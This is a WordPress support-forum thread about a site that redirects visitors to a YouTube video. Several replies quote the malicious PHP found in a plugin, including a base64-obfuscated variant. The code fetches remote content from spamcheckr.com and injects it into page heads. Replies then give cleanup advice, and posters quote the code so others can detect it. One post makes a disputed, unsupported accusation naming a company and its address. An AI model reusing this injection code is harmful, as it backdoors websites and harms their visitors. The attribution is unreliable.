• Resolved rankfast

    (@rankfast)


    Today I opened my website thru a bookmarked link and my site automatically redirected to a justin beiber video on youtube. I downloaded my site files and searched the files with notepad++. Somehow the redirect was configured in the w3 total cache folder. Does anyone know how this could have happened?

    `Search “watch?v=RFngSCaY5nA” (2 hits in 2 files)
    C:\Users\Nickstar\Desktop\survival tech\backup\4-5\ftp\wp-content\cache\page_enhanced\www.survivaltechgear.com\product-tag\pocket-chainsaw\_index.html.old (1 hit)
    Line 20: http-equiv=”refresh” content=”0; url=https://www.youtube.com/watch?v=RFngSCaY5nA”/> <!–[if lte IE 8]><script type=”text/javascript”>/*<![CDATA[*/jQuery(document).ready(function(){var imgs,i,w;var imgs=document.getElementsByTagName(‘img’);for(i=0;i<imgs.length;i++){w=imgs[i].getAttribute(‘width’);imgs[i].removeAttribute(‘width’);imgs[i].removeAttribute(‘height’);}});/*]]>*/</script><![endif]–><script type=”text/javascript”>/*<![CDATA[*//*@cc_on
    C:\Users\Nickstar\Desktop\survival tech\backup\4-5\ftp\wp-content\cache\page_enhanced\www.survivaltechgear.com\search\1\_index.html.old (1 hit)
    Line 20: http-equiv=”refresh” content=”0; url=https://www.youtube.com/watch?v=RFngSCaY5nA”/> <!–[if lte IE 8]><script type=”text/javascript”>/*<![CDATA[*/jQuery(document).ready(function(){var imgs,i,w;var imgs=document.getElementsByTagName(‘img’);for(i=0;i<imgs.length;i++){w=imgs[i].getAttribute(‘width’);imgs[i].removeAttribute(‘width’);imgs[i].removeAttribute(‘height’);}});/*]]>*/</script><![endif]–><script type=”text/javascript”>/*<![CDATA[*//*@cc_on

Viewing 15 replies - 1 through 15 (of 15 total)
  • Hi I just got that exact, exact, exact problem and the same bieber video. How did u fix it, where exactly is the file containing that?

    Thread Starter rankfast

    (@rankfast)

    The redirect code is in the wp-content/cache folder. I had to manuallly delete the cache via FTP. I’m a little worried about w3 Total Caches security. How did the code get added to the cache folder and is it going to happen again?

    Hey I am having the same problem and it is redirecting to a Justine beiber Video..My readers are complaining..Shall i remove the plugin?

    @sahithhazari: If you require assistance then, as per the Forum Welcome, please post your own topic instead of tagging onto someone else’s topic.

    We had this problem and it had nothing to do with the w3 cache.

    This is the code you are looking for

    [code] if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists('curl_init')){$addressd = "https://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqqc2_chesk');}} [/code]

    Download all of your site files via FTP, then download a program called ‘FileSeek’ (its free).

    Set it to scan your site files for the term ‘https://spamcheckr.com/l.php&#8217;

    You will find the infected files and remove the instance of ‘https://spamcheckr.com/l.php&#8217; and the surrounding malicious code.

    I hope this helps someone. Good luck.

    Thread Starter rankfast

    (@rankfast)

    Thanks Gekkoshot. I found te code and removed it. It was in a plugin I had installed

    No problem, glad to help ??

    Having the exact same problem, Notepad++ didn’t find the code, but fileseek did. Thanks a lot for your help !!

    BUT …

    How could we be sure that we won’t have the same problem after deletion ?

    Secure your sites with some good WP security plugins.

    For example –

    Better WP Security
    Sucuri Security – SiteCheck Malware Scanner

    You could also update you main admin and FTP passwords as an extra precaution

    Also over the next few days, regularly check your site files by FTP, you will notice the times and dates that certain files have been altered, if you didn’t update them, investigate further..

    Also, only use plugins etc from trusted sources, we used a plugin forwarded to us from a third party and that’s how we got infected.

    Thanks a lot for these advices.

    I checked further, and i had the same infection type as you : a plugin forwarded by a friend … will have to be more careful.

    Again, you rock !

    To FIX it Check Gekkoshot article

    This is the code you are looking for

    [code] if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists('curl_init')){$addressd = "https://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqqc2_chesk');}} [/code]

    Download all of your site files via FTP, then download a program called ‘FileSeek’ (its free).

    Set it to scan your site files for the term ‘https://spamcheckr.com/l.php&#8217;

    You will find the infected files and remove the instance of ‘https://spamcheckr.com/l.php&#8217; and the surrounding malicious code.

    https://www.ads-software.com/support/topic/my-website-is-redirecting-to-a-youtube-video?replies=11

    Thank You For your help !

    And i have made a trace to see from whom is coming all this issue and got him , if someone need to contact him here id the info :

    https://www.bnbclone.com/ owns https://spamcheckr.com/ (virus code)

    BnbClone.com | Nemo Limited
    Suite 102, Ground Floor
    Corner of Eyre & Hutson Streets, Belize City, Belize
    Registrant Phone: +507.65967959

    @hmx Radio
    Your claim that https://www.bnbclone.com | Nemo Limited owns https://spamcheckr.com/ (virus code) is completely NOT TRUE – where did you get this info?

    https://www.bnbclone.com/ is a vacation rental / peer to peer software company and their products and services are clearly explained on their website and have NO CONNECTION to https://spamcheckr.com/

    Suggest you reframe from posting incorrect information which cannot be backed up!

    Thank you soo Much!!!

    If you can’t find https://spamcheckr.com/l.php look for the code below.

    <?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqc2_chesk() {if(function_exists('curl_init')) {$addressd=base64_decode("c3BhbWNoZWNrci5jb20vY2hlY2sucGhw");$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqc2_chesk');}}?>

    Thankyou so much Its work

Viewing 15 replies - 1 through 15 (of 15 total)
  • The topic ‘My website is redirecting to a youtube video’ is closed to new replies.